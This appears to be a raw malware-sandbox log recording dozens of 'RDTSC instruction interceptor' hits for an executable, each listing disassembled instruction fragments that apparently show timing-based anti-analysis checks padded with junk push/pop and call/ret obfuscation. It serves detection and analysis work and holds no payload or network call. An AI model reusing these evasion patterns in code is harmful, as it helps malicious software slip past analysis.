Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7ECEF second address: F7ED12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E84B4EF87h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7ED12 second address: F7ED16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F819AA second address: F819BC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8E84B4EF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F8E84B4EF76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F80B1A second address: F80B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7FB73 second address: F7FB7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F819BC second address: F819C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7FB7D second address: F7FB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F80BE3 second address: F80BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F80BE8 second address: F80C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E84B4EF89h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F82A21 second address: F82A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F82A25 second address: F82A46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F8E84B4EF76h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F81B7A second address: F81B7F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F83A67 second address: F83A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8E84B4EF76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F83A72 second address: F83A84 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8E8511F5D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F84B6D second address: F84B72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F86D69 second address: F86DC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a sub bx, C7F9h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F8E8511F5D8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jmp 00007F8E8511F5E3h 0x00000030 mov ebx, dword ptr [ebp+12479A01h] 0x00000036 push 00000000h 0x00000038 mov ebx, 1E26E587h 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F86DC3 second address: F86DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F8E6DA second address: F8E6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F920E7 second address: F920ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F920ED second address: F920F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F920F3 second address: F92111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8E84B4EF89h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F92111 second address: F9212C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E6h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F918A1 second address: F918A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F918A7 second address: F918AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F918AD second address: F918B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F918B3 second address: F918BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F918BD second address: F918C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F918C3 second address: F918C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F91B55 second address: F91B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F91B59 second address: F91B6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b jns 00007F8E8511F5D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F97734 second address: F9775A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007F8E84B4EF76h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8E84B4EF80h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F9775A second address: F97764 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E8511F5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F97764 second address: F97771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F97771 second address: F97776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F97776 second address: F9779A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d je 00007F8E84B4EF94h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F9EC1E second address: F9EC24 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F9E056 second address: F9E05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F9E33A second address: F9E340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F9E7B2 second address: F9E7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F9E909 second address: F9E914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8E8511F5D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F9EA89 second address: F9EA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E84B4EF7Bh 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA3DB6 second address: FA3DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA3F6A second address: FA3F73 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA4119 second address: FA411E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA4429 second address: FA442D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA442D second address: FA4431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA4431 second address: FA4446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F8E84B4EF76h 0x0000000d jbe 00007F8E84B4EF76h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA488B second address: FA48B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8E8511F5E7h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F8E8511F5D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA49F1 second address: FA49FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8E84B4EF76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA49FB second address: FA4A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA4A00 second address: FA4A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8E84B4EF76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA4A0C second address: FA4A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E8511F5E0h 0x00000009 popad 0x0000000a jmp 00007F8E8511F5E5h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA4A3D second address: FA4A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA4A43 second address: FA4A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA4BD1 second address: FA4BF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F8E84B4EF7Eh 0x0000000e popad 0x0000000f js 00007F8E84B4EF8Ah 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FA858D second address: FA8593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAFA91 second address: FAFABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8E84B4EF76h 0x0000000a popad 0x0000000b jnl 00007F8E84B4EF85h 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAFABD second address: FAFAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F748FA second address: F74901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F74901 second address: F7490F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7490F second address: F74913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F74913 second address: F74919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F74919 second address: F74949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8E84B4EF76h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edi 0x00000013 jmp 00007F8E84B4EF86h 0x00000018 pop edi 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F74949 second address: F74970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F8E8511F5E4h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F74A37 second address: F74A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F74A3D second address: F74A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F74A42 second address: F74A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F74A96 second address: F74AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F8E8511F5E1h 0x0000000b xchg eax, esi 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F8E8511F5D8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 nop 0x00000027 jmp 00007F8E8511F5DEh 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F8E8511F5E9h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F751B0 second address: F751BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8E84B4EF76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F755A1 second address: F755C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007F8E8511F5D6h 0x00000010 jmp 00007F8E8511F5E2h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F755C4 second address: F75624 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push esi 0x0000000b mov dx, si 0x0000000e pop ecx 0x0000000f lea eax, dword ptr [ebp+12482053h] 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F8E84B4EF78h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f add dword ptr [ebp+122D17BFh], ebx 0x00000035 push eax 0x00000036 jng 00007F8E84B4EF8Dh 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8E84B4EF7Fh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F75624 second address: F75683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F8E8511F5E4h 0x0000000e jmp 00007F8E8511F5DCh 0x00000013 pop ecx 0x00000014 lea eax, dword ptr [ebp+1248200Fh] 0x0000001a call 00007F8E8511F5DCh 0x0000001f jmp 00007F8E8511F5E7h 0x00000024 pop ecx 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jc 00007F8E8511F5D6h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F75683 second address: F75687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F75687 second address: F7568D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7568D second address: F75692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAED78 second address: FAED7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAED7E second address: FAED82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAED82 second address: FAEDB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8E8511F5E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8E8511F5DEh 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAEDB0 second address: FAEDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAEDB6 second address: FAEDC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8E8511F5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAF4F0 second address: FAF50A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8E84B4EF84h 0x00000008 jmp 00007F8E84B4EF7Ch 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAF50A second address: FAF51B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FAF67D second address: FAF68F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007F8E84B4EF76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB5382 second address: FB5390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8E8511F5D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB5390 second address: FB539B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB539B second address: FB539F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB568A second address: FB56DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8E84B4EF7Ah 0x0000000b jne 00007F8E84B4EF76h 0x00000011 popad 0x00000012 pushad 0x00000013 js 00007F8E84B4EF76h 0x00000019 jmp 00007F8E84B4EF87h 0x0000001e popad 0x0000001f push esi 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 pop esi 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 jg 00007F8E84B4EF82h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB5C1E second address: FB5C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB5C24 second address: FB5C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E84B4EF84h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB5C42 second address: FB5C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: FB5C46 second address: FB5C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
